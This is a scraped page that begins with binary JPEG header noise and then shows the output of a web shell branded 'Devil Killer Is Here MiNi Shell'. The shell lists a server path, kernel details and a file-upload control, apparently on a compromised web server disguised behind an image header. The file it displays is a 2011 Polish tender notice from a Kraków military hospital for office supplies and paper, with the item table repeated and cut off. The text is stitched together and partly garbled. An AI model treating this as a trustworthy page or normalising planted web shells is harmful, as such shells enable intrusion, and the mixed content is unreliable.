JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111228/345677-N-2011.html

<p class="kh_header"><b>Kraków: DOSTAWY  MATERIAŁÓW I DROBNEGO SPRZĘTU BIUROWEGO ORAZ  PAPIERU KSEROGRAFICZNEGO I KOMPUTEROWEGO</b><br>
<b>Numer ogłoszenia: 345677 - 2011; data zamieszczenia: 28.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 5 Wojskowy Szpital Kliniczny z Polikliniką Samodzielny Publiczny ZOZ , ul. Wrocławska 1-3, 30-901 Kraków, woj. małopolskie, tel. 12 63 08 099, faks 12 63 08 099.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.5wszk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWY  MATERIAŁÓW I DROBNEGO SPRZĘTU BIUROWEGO ORAZ  PAPIERU KSEROGRAFICZNEGO I KOMPUTEROWEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PAKIET NR 1 - MATERIAŁY ORAZ DROBNY SPRZĘT BIUROWY
LP	Szczegółowa nazwa przedmiotu zamówienia	Kod CPV	JM	Ilość	kwota netto	wartość netto 	Stawka VAT (%)	wartość 
   brutto	Nazwa handlowa  nr katalogowy
1	2	3	4	5	6	7	8	     9	       10
1	Blok listowy, kratka, A4, 100 kartek.	22816000-3	szt 	20					
2	Datownik, samotuszujący, wysokość liter 3,8 mm.	30192150-7	szt 	20					
3	Długopis automatyczny, grubość 0,5 mm, różne kolory, z gumową obsadką (piszące na drukach samokopiujących z obu stron)	30192121-5	szt 	800					
4	Długopis, grubocść 0,5 mm, różne kolory,(piszące na drukach samokopiujących z obu stron)	30192121-5 	szt	800					
5	Długopis, wkład, grubość 0,7 mm, różne kolory z gumową obsadką.(piszące na drukach samokopiujących z obu stron)	30192121-5	szt	400					
6	Druki KP samokopiujace po 100 kartek, wielokopia.	22822200-0	bl	500					
7	Dziurkacz biurowy, regulacja rozmiaru papieru, dziurkuje do 25 kartek 80 g M2 	30197330-8	szt	10					
8	Etykiety 38x21,2mm w opakowaniu po 100 arkuszy, białe, samoprzylepne do drukarek laserowych	30192800-9	op	110					
9	Folia do laminowania, A4 po 100 szt., 216x303mm, 100 mikronów.	30190000-7	op	4					
10	Folia do laminowania, wizytówkowa po 100 szt., 60x95mm, 175 mikronów.	30190000-7	op	3					
11	Folia przeźroczysta A4 do bindowania, opakowanie (100 szt.) 150 mic.	30190000-7	op	2					
12	Gumka olowkowa do 15g 	30192100-2	szt	50					
13	Kalendarz biurkowy,stojacy na 2013rok	30199792-8	szt	120					
14	Kalendarz trojdzielny,wiszacy na 2013 rok	30199792-8	szt	120					
15	Klej introligatorski 60 ml	24910000-6	szt	40					
16	Klej w sztyfcie 15g.	24910000-6	szt	300					
17	Klej biurowy magiczny	24910000-6	szt	40					
18	Klip deska A4 różne kolory	30191130-4	szt	30					
19	Klip teczka A4 różne kolory	30191130-4	szt	30					
20	Klip A5 teczka różne kolory	30191130-4	szt	20					
21	Klipsy archiwizacyjne (50 szt.)	30190000-7	op	20					
22	Koperta (biała) bez okienka 110x220mm. (50 szt.)	30199230-1	op	10					
23	Koperta (biała) z okienkiem po lewej stronie 110x220mm. (50 szt.)	30199230-1	op	80					
24	Koperta (biała) z okienkiem po prawej stronie 110x220mm. (50 szt.)	30199230-1	op	20					
25	Koperta B4 samoprzylepne, brązowa. (50 szt.)	30199230-1	op	10					
26	Koperta B5 zaklejana na mokro, brązowa. (500 szt.)	30199230-1	op	100					
27	Koperta C4 samoprzylepne, brązowa. (50 szt.)	30199230-1	op	40					
28	Koperta C5, biała, samo klejąca (50 szt.)	30199230-1	op	50					
29	Koperta C6, biała, samo klejąca (50 szt.)	30199230-1	op	50					
30	Korektor w taśmie, biały, szer. taśmy 4,2 mm, dł. 8,5mb	30192160-0	szt	100					
31	Korektor wodny w piórze,	30192930-9	szt	30					
32	Korektor wodny z pędzelkiem, 20 ml.	30192160-0	szt	120					
33	Koszulka A4 na dokumenty do segregatora, opakowanie po 100 szt., groszkowa.	30190000-7	op	220					
34	Linijka plastikowa, długość 30cm.	30190000-7	szt	20					
35	Listwy do oprawy różne kolory 3-6 mm - elastyczne (50 szt.) 	30190000-7	op	5					
36	Listwy do oprawy różne kolory 9-12 mm - elastyczne (50 szt.) 	30190000-7	op	6					
37	Marker do płyt CD DVD, grubość 0,5 mm, różne kolory.	30192125-3	szt	50					
38	Marker permamentny z okrągłą końcówką różne kolory	30192125-3	szt	600					
39	Notes samoprzylepny 38x51	22816300-6	szt	100					
40	Notes samoprzylepny 76x76mm 100 kartek.	22816300-6	szt	50					
41	Zakładka 4 kolorowa	30192800-9	szt	10					
42	Nożyczki do papieru, z plastikowym uchwytem, długość 21cm.	30190000-7	szt	30					
43	Okładka A4 do bindowania, skóropodobna, różne kolory, opakowanie a 100 sztuk.	30190000-7	op	45					
44	Okładka kanałowa AA,A,B,C - różne kolory	30190000-7	szt	450					
45	Okładki na dyplom A4, twarde, oklejane materiałem skóropodobnym, różne kolory.	30190000-7	szt	10					
46	Ołówek z gumką, HB.	30192130-1	szt	70					
47	Pióro kulkowe, różne kolory 0,5 mm.	30192121-5	szt	20					
48	Pisaki: 4 (cztery) kolory w opakowaniu, dwustronne, cienki   gruby.	30192125-3	op	20					
49	Pocztowa ksiazka nadawcza A-5	22800000-8	bl	25					
50	Rolka kasowa offset 57mm 30mb. - 10szt. w opakowaniu	30192350-9	op	5					
51	Rolka kasowa termiczna (28mm x 25m)	30192350-9	szt	500					
52	Segregator A4, szerokość 50mm, na dwa otwory.	30199500-5	szt	100					
53	Segregator A4, szerokość 30mm, na dwa otwory.	30199500-5	szt	50					
54	Segregator A4, szerokość 70mm, na dwa otwory.	30199500-5	szt	200					
55	Segregator A5, szerokość 70mm, na dwa otwory.	30199500-5	szt	50					
56	Skoroszyt A4, plastikowy, różne kolory.	22851000-0	szt	100					
57	Skoroszyt A4, plastikowy, różne kolory z mozliwością wpinania do segregatora	22851000-0	szt	200					
58	Spinacze biurowe okrągłe 28mm, opakowanie po 100 sztuk.	30197220-4	op	300					
59	Spinacze-klipsy 19mm, po 12 sztuk w opakowaniu.	30197220-4	op	25					
60	Spinacze-klipsy 25mm po 12 sztuk w opakowaniu.	30197220-4	op	25					
61	Spinacze-klipsy 32mm po 12 sztuk w opakowaniu.	30197220-4	op	20					
62	Spinacze-klipsy 41mm po 12 sztuk w opakowaniu.	30197220-4	op	10					
63	Spinacze-klipsy 51mm po 12 sztuk w opakowaniu.	30197220-4	op	10					
64	Tablica korkowa 100x80 cm.	30195000-2	szt	4					
65	Taśma dwustronna klejąca, szerokość min. 30mm 4mb.	44424200-0	szt	50					
66	Taśma pakowa 48mm 50 mb	44424200-0	szt	80					
67	Taśma przeźroczysta klejąca 18mm 20mb.	44424200-0	szt	50					
68	Teczka A4, skrzydłowa, kolorowa, zapinana na rzep, (tektura 750g).szerokosc 3,5cm 	30190000-7	szt	20					
69	Teczka A4, tekturowa z gumką, kolorowa (tektura 450g).	30190000-7	szt	500					
70	Teczka tekturowa z gumką biała 350g	30190000-7	szt	500					
71	Teczka A4, tekturowa, wiązana, biała (tektura 450g).	30190000-7	szt	100					
72	Teczka zawieszana 250g m2 	30190000-7	szt	300					
73	Teczka do podpisu 12 przegrudek	22800000-8	szt	10					
74	Terminarz A4 tydzień na dwóch stronach na 2013 rok	30196100-0	szt	5					
75	Terminarz A-5 jeden dzień na stronie na 2013 rok 	30196100-0	szt	150					
76	Tusz do stempli różne kolory, 30ml flakon	30190000-7	szt	70					
77	Zakreślacz, różne kolory.	30192125-3	szt	100					
78	Zeszyt A4, 96 kartek, kratka, z marginesem, oprawa twarda, szyty.	22815000-6	szt	100					
79	Zeszyt A5, 32 kartki, kratka, z marginesem, oprawa miękka.	22815000-6	szt	50					
80	Zeszyt A5, 60 kartek, kratka, z marginesem, oprawa miękka.	22815000-6	szt	50					
81	Zeszyt A5,96 kartek, kratka, z marginesem, oprawa twarda, szyty.	22815000-6	szt	100					
82	Zszywacz biurowy dla 100 zszywek 24 6, możliwość zszycia 20 kartek, 80 g m2.	30197320-5	szt	30					
83	Zszywki biurowe 24 6, 1000 szt. w opakowaniu.	30197100-7	op	400					
84	Stojak 3 szuflady metalowy	30193000-8	szt	5					
85	Zestaw na biurko5 elementow metalowy	30193000-8	szt	3					
86	Marker sucho ścieralny	30192125-3	kpl.	5					
87	Poduszka do stępli (różne kolory)	30192111-2	szt	10					
88	Szuflafda plastikowa na dokumenty	30193200-0	szt	20					
89	Cienkopis różne kolory	30192125-3	szt	100					
90	Okładka do termobindownicy mini	30192500-6	szt	100					
91	Przypinacze tablicowe 30 szt opak	30197100-7	szt	10					
92	Ofertówka z pcv	30190000-7	szt	150					
93	Skorowidz 3 4 A4	30190000-7	szt	5					
94	Antyrama A4	30190000-7	szt	30					
95	Blok techniczny A4 10 kartek	30197600-2	szt	10					
96	Folia do palet	30190000-7	szt	12					
97	Zastrugaczka metalowa 	30190000-7	szt	40					
98	Wkład do pistoletu polimer klej	30190000-7	szt	20					
99	Pistolet do kleju polimerowego	30190000-7	szt	2					
100	Plastelina (6 szt opak)	30190000-7	szt	5					
101	Tablica magnetyczna 60x90	30195920-7	szt	4					
102	Kartka okazyjna (okolicznościowa z kopertą)	22321000-6	szt	200					
103	Dyplom A4	30199500-5	szt	300					
104	Kartonwizytówkowy	30199730-5	szt	100					
105	Pinezka metalowa 30 szt tapicerskie	30190000-7	op	10					
106	Pojemnik do archiwicacji 100 mm	30190000-7	szt	50					
107	Pojemnik do archiwicacji 80 mm	30190000-7	szt	50					
108	Gumka recepturka	30190000-7	op	5					
109	Rozszywacz	30190000-7	szt	10					
110	Grzbiety plastikowe do bind 16 mm 100 szt	30190000-7	op	2					
111	Przekładka alfabetyczna A4 do segregatora	30190000-7	szt	5					
112	Niszczarka z funkcja niszczenia płyt CD	30191400-8	szt	4					
113	Bindownica kanałowa do szerokości C	30191000-4	szt	1					
114	Laminator A4 	30191000-4	szt	1					
115	Gilotyna ręczna do 10 kartek	30191000-4	szt	1					
Razem					


PAKIET NR 2 - PAPIER KSEROGRAFICZNY I KOMPUTEROWY

LP	Szczegółowa nazwa przedmiotu zamówienia	Kod CPV	JM	ILOŚĆ	kwota netto	wartość netto 	Stawka VAT (%)	wartość brutto	Nazwa handlowa  nr katalogowy
1	2	3	4	5	6	7	8		
1	Papier komputerowy perforowany 240 70g z nadrukiem kolorowym oryginał  kopia 1+0	3019933-02	op	25					
2	Papier komputerowy perforowany 240 70g z nadrukiem kolorowym oryginał 1+1 	30199330-2	op	35					
3	Papier komputerowy perforowany 240 70g z nadrukiem kolorowym oryginał 1+2 	30199330-2	op	30					
4	Papier komputerowy perforowany 360 70g 1+0 	30199330-2	op	1					
5	Papier Xero A4 80g m pakowany w ryzach po 500 kartek, białość CIE - 146	30197644-2	op	3000					
6	Papier Xero A3 80g m pakowany w ryzach po 500 kartek, białość CIE - 146	30197644-2	op	300					
7	Papier ksero A4 160 gr m2 pakowany w ryzach po 250 kartek biały	30197642-8	op	15					
8	Papier ksero A4 160 gr m2 pakowany w ryzach po 250 kartek kolor	30197642-8	op	6					
9	Papier xero A3 220 g 250 k biały	30197642-8	op	2					
RAZEM				

warunki graniczne dla pakietu nr 2


L.P.	    zestawienie warunków wymaganych dla papieru kserograficznego i komputerowego
	WARUNEK GRANICZNY	
PARAMETRY 
OFEROWANE
1	Papier xero:  winien zapewniać możliwość szybkiego druku, kopiowania jednostronnie i dwustronnie. Dla następujących urządzeń :  kserokopiarek wysoko nakładowych, faxów , drukarek laserowych i atramentowych,
	        TAK	
2	Papier xero ma mieć możliwość druku czarnobiałego i kolorowego	TAK	
3	Papier xero ma posiadać gramaturę 80 g m2, białość CIE 146 i być nie mieszany	TAK	
4	Składanka wielowarstwowa (papier samokopiujący - dot. papieru komputerowego) ma posiadać 5 letni okres gwarancji na zdolności kopiowania 25 lat na trwałość kopii, wszystkie rodzaje papieru mają być bezpieczne dla środowiska i poddawać się recyklingowi.	TAK.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 22.81.60.00-3, 30.19.21.50-7, 30.19.21.21-5, 22.82.22.00-0, 30.19.73.30-8, 30.19.00.00-7, 30.19.21.00-2, 30.19.93.33-2, 30.19.76.44-2, 30.19.76.42-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	 Wypełniony FORMULARZ OFERTOWY - według ZAŁĄCZNIKA NR 2 do SIWZ.
2.	Wypełniony we wskazanych miejscach - FORMULARZ CENOWY - OPIS PRZEDMIOTU ZAMÓWIENIA - według ZAŁĄCZNIKA NR 1 do SIWZ.
3.	Pełnomocnictwo umocowujące przynajmniej w zakresie podpisania oferty w postępowaniu 
o udzielenie zamówienia publicznego, dołączone do oferty, o ile nie wynika z innych dokumentów, załączonych przez Wykonawcę.
4.	Oświadczenie Wykonawcy dotyczące spełnienia warunków udziału w postępowaniu, ściśle według formularza stanowiącego ZAŁĄCZNIK NR 3 do SIWZ.
5.	Oświadczenie Wykonawcy dotyczące niepodlegania wykluczeniu ściśle według formularza stanowiącego ZAŁĄCZNIKIEM NR 4 do SIWZ.
6.	Aktualny odpis z właściwego rejestru w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszystkie zmiany treści Umowy wymagają porozumienia Stron Umowy oraz zachowania formy pisemnej pod rygorem nieważności.
Kupujący dopuszcza zmiany umowy wyłącznie w zakresie przewidzianym w § 3 ust. 9, 11 i § 8 ust. 2 wzoru umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.5wszk.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> budynek nr 32(budynek Komendantury) 5 Wojskowego Szpitala Klinicznego z Polikliniką,ul. Wrocławska 1-3, 30 - 901 Kraków - Gabinet Radcy Prawnego...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.01.2012 godzina 11:00, miejsce: Kancelaria Szpitala(budynek komendy) ul. Wrocławska 1-3, 30 - 901 Kraków...</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> MATERIAŁY ORAZ DROBNY SPRZĘT BIUROWY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET NR 1 - MATERIAŁY ORAZ DROBNY SPRZĘT BIUROWY
LP	Szczegółowa nazwa przedmiotu zamówienia	Kod CPV	JM	Ilość	kwota netto	wartość netto 	Stawka VAT (%)	wartość 
   brutto	Nazwa handlowa  nr katalogowy
1	2	3	4	5	6	7	8	     9	       10
1	Blok listowy, kratka, A4, 100 kartek.	22816000-3	szt 	20					
2	Datownik, samotuszujący, wysokość liter 3,8 mm.	30192150-7	szt 	20					
3	Długopis automatyczny, grubość 0,5 mm, różne kolory, z gumową obsadką (piszące na drukach samokopiujących z obu stron)	30192121-5	szt 	800					
4	Długopis, grubocść 0,5 mm, różne kolory,(piszące na drukach samokopiujących z obu stron)	30192121-5 	szt	800					
5	Długopis, wkład, grubość 0,7 mm, różne kolory z gumową obsadką.(piszące na drukach samokopiujących z obu stron)	30192121-5	szt	400					
6	Druki KP samokopiujace po 100 kartek, wielokopia.	22822200-0	bl	500					
7	Dziurkacz biurowy, regulacja rozmiaru papieru, dziurkuje do 25 kartek 80 g M2 	30197330-8	szt	10					
8	Etykiety 38x21,2mm w opakowaniu po 100 arkuszy, białe, samoprzylepne do drukarek laserowych	30192800-9	op	110					
9	Folia do laminowania, A4 po 100 szt., 216x303mm, 100 mikronów.	30190000-7	op	4					
10	Folia do laminowania, wizytówkowa po 100 szt., 60x95mm, 175 mikronów.	30190000-7	op	3					
11	Folia przeźroczysta A4 do bindowania, opakowanie (100 szt.) 150 mic.	30190000-7	op	2					
12	Gumka olowkowa do 15g 	30192100-2	szt	50					
13	Kalendarz biurkowy,stojacy na 2013rok	30199792-8	szt	120					
14	Kalendarz trojdzielny,wiszacy na 2013 rok	30199792-8	szt	120					
15	Klej introligatorski 60 ml	24910000-6	szt	40					
16	Klej w sztyfcie 15g.	24910000-6	szt	300					
17	Klej biurowy magiczny	24910000-6	szt	40					
18	Klip deska A4 różne kolory	30191130-4	szt	30					
19	Klip teczka A4 różne kolory	30191130-4	szt	30					
20	Klip A5 teczka różne kolory	30191130-4	szt	20					
21	Klipsy archiwizacyjne (50 szt.)	30190000-7	op	20					
22	Koperta (biała) bez okienka 110x220mm. (50 szt.)	30199230-1	op	10					
23	Koperta (biała) z okienkiem po lewej stronie 110x220mm. (50 szt.)	30199230-1	op	80					
24	Koperta (biała) z okienkiem po prawej stronie 110x220mm. (50 szt.)	30199230-1	op	20					
25	Koperta B4 samoprzylepne, brązowa. (50 szt.)	30199230-1	op	10					
26	Koperta B5 zaklejana na mokro, brązowa. (500 szt.)	30199230-1	op	100					
27	Koperta C4 samoprzylepne, brązowa. (50 szt.)	30199230-1	op	40					
28	Koperta C5, biała, samo klejąca (50 szt.)	30199230-1	op	50					
29	Koperta C6, biała, samo klejąca (50 szt.)	30199230-1	op	50					
30	Korektor w taśmie, biały, szer. taśmy 4,2 mm, dł. 8,5mb	30192160-0	szt	100					
31	Korektor wodny w piórze,	30192930-9	szt	30					
32	Korektor wodny z pędzelkiem, 20 ml.	30192160-0	szt	120					
33	Koszulka A4 na dokumenty do segregatora, opakowanie po 100 szt., groszkowa.	30190000-7	op	220					
34	Linijka plastikowa, długość 30cm.	30190000-7	szt	20					
35	Listwy do oprawy różne kolory 3-6 mm - elastyczne (50 szt.) 	30190000-7	op	5					
36	Listwy do oprawy różne kolory 9-12 mm - elastyczne (50 szt.) 	30190000-7	op	6					
